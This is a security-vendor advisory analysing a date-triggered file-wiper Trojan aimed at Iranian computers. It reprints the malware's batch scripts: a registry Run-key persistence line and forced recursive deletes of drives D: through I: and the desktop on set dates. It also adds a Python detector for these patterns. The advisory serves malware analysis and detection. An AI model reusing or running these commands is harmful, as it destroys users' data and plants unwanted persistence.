New File Wiper Trojan targeting Iran

December 22, 2012

The Dell SonicWALL Threats Research team received reports of a new file wiper Trojan. Its purpose is simple: delete files on a specified range of drives on specified dates. The targets can be remote storage devices or local external storage, as long as they are mounted under particular drive letters. It has been widely reported that the attack is targeted and that the Trojan is aimed at Iranian computers.

Infection cycle:

The Trojan adds the following files to the filesystem. They are contained in the RAR-compressed portion of the original binary [Detected as GAV: DelFiles.NBV (Trojan)]:

  • %SYSTEM32%\jucheck.exe [Detected as GAV: Batchwiper.A (Trojan)]
  • %SYSTEM32%\juboot.exe [Detected as GAV: Batchwiper.A (Trojan)]
  • %SYSTEM32%\SLEEP.EXE [non-malicious sleep utility]
  • %USERPROFILE%\Local Settings\Temp\E.tmp\juboot.bat [dropped by juboot.exe]
  • %USERPROFILE%\Local Settings\Temp\11.tmp\jucheck.bat [dropped by jucheck.exe]

The Trojan adds the following key to the Windows registry to enable startup after reboot:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run jucheck.exe "%SYSTEM32%\jucheck.exe"

The file juboot.bat contains the following data that is used to initiate infection:

      @echo off & setlocal
      sleep for 2
      REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v jucheck.exe /t REG_SZ /d "%systemroot%\system32\jucheck.exe" /f
      start "" /D"%systemroot%\system32" "jucheck.exe"

The file jucheck.bat contains the following data, which causes all files on the desktop and on drives D: through I: to be wiped on the specified dates:

      @echo off & setlocal
      sleep for 2
      del "%systemroot%\system32\juboot.exe" /q /s /f
      del "%userprofile%\Start Menu\Programs\Startup\GrooveMonitor.exe" /q /s /f
      if "%date%"=="Mon 12/10/2012" goto yes
      if "%date%"=="Tue 12/11/2012" goto yes
      if "%date%"=="Wed 12/12/2012" goto yes
      if "%date%"=="Mon 01/21/2013" goto yes
      if "%date%"=="Tue 01/22/2013" goto yes
      if "%date%"=="Wed 01/23/2013" goto yes
      if "%date%"=="Mon 05/06/2013" goto yes
      if "%date%"=="Tue 05/07/2013" goto yes
      if "%date%"=="Wed 05/08/2013" goto yes
      if "%date%"=="Mon 07/22/2013" goto yes
      if "%date%"=="Tue 07/23/2013" goto yes
      if "%date%"=="Wed 07/24/2013" goto yes
      if "%date%"=="Mon 11/11/2013" goto yes
      if "%date%"=="Tue 11/12/2013" goto yes
      if "%date%"=="Wed 11/13/2013" goto yes
      if "%date%"=="Mon 02/03/2014" goto yes
      if "%date%"=="Tue 02/04/2014" goto yes
      if "%date%"=="Wed 02/05/2014" goto yes
      if "%date%"=="Mon 05/05/2014" goto yes
      if "%date%"=="Tue 05/06/2014" goto yes
      if "%date%"=="Wed 05/07/2014" goto yes
      if "%date%"=="Mon 08/11/2014" goto yes
      if "%date%"=="Tue 08/12/2014" goto yes
      if "%date%"=="Wed 08/13/2014" goto yes
      if "%date%"=="Mon 02/02/2015" goto yes
      if "%date%"=="Tue 02/03/2015" goto yes
      if "%date%"=="Wed 02/04/2015" goto yes
      goto no
      sleep for 3000
      IF EXIST d: del "d:\*.*" /q /s /f
      IF EXIST d: Chkdsk d:
      IF EXIST e: del "e:\*.*" /q /s /f
      IF EXIST e: Chkdsk e:
      IF EXIST f: del "f:\*.*" /q /s /f
      IF EXIST f: Chkdsk f:
      IF EXIST g: del "g:\*.*" /q /s /f
      IF EXIST g: Chkdsk g:
      IF EXIST h: del "h:\*.*" /q /s /f
      IF EXIST h: Chkdsk h:
      IF EXIST i: del "i:\*.*" /q /s /f
      IF EXIST i: Chkdsk i:
      del "%userprofile%\Desktop\*.*" /q /s /f
      start calc

The .bat files are deleted after execution.
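As an added triage aid (written here, not code from the advisory or from SonicWALL), the script below pulls the date-trigger logic, the drive-root deletions and the Run-key persistence out of a dropped batch file so an analyst can turn a sample like the listings above into a trigger-date list. The embedded input is a constructed excerpt combining lines from the two listings; the function and pattern names are assumptions of this example.

```python
import re
from datetime import datetime

# Constructed excerpt modelled on the juboot.bat / jucheck.bat listings above.
SAMPLE_BAT = r"""@echo off & setlocal
sleep for 2
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v jucheck.exe /t REG_SZ /d "%systemroot%\system32\jucheck.exe" /f
del "%systemroot%\system32\juboot.exe" /q /s /f
if "%date%"=="Mon 12/10/2012" goto yes
if "%date%"=="Tue 12/11/2012" goto yes
if "%date%"=="Mon 02/02/2015" goto yes
goto no
IF EXIST d: del "d:\*.*" /q /s /f
IF EXIST d: Chkdsk d:
IF EXIST e: del "e:\*.*" /q /s /f
del "%userprofile%\Desktop\*.*" /q /s /f
"""

# Literal string compare against %date%, i.e. the locale short-date format "ddd MM/dd/yyyy".
DATE_RE = re.compile(r'if\s+"%date%"=="(\w{3}) (\d{2}/\d{2}/\d{4})"\s+goto', re.I)
# Recursive, forced, quiet delete of an entire drive root.
ROOT_DEL_RE = re.compile(r'del\s+"([a-z]):\\\*\.\*"\s+/q\s+/s\s+/f', re.I)
# HKCU Run-key persistence written via reg.exe.
RUN_KEY_RE = re.compile(r'REG\s+add\s+HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\b', re.I)

def trigger_dates(text):
    """Return (date, weekday_ok) pairs. Because the batch compares %date% as a
    literal string, the weekday prefix must agree with the calendar (and the
    victim's short-date format must match) or the branch never fires."""
    out = []
    for weekday, mdy in DATE_RE.findall(text):
        d = datetime.strptime(mdy, "%m/%d/%Y").date()
        out.append((d, d.strftime("%a").lower() == weekday.lower()))
    return out

def wiped_drives(text):
    """Drive letters whose root is deleted recursively."""
    return sorted({m.upper() for m in ROOT_DEL_RE.findall(text)})

def triage(text):
    dates = trigger_dates(text)
    drives = wiped_drives(text)
    return {
        "trigger_dates": [d.isoformat() for d, _ in dates],
        "weekday_consistent": all(ok for _, ok in dates),
        "wiped_drive_roots": drives,
        "run_key_persistence": bool(RUN_KEY_RE.search(text)),
        "is_date_triggered_wiper": bool(dates) and bool(drives),
    }
```

Running `triage` over the real jucheck.bat yields the 27 trigger dates, drives D: through I:, and no Run-key entry (that line lives in juboot.bat), which is why the two dropped files should be triaged together.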

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: DelFiles.NBV (Trojan)
  • GAV: Batchwiper.A (Trojan)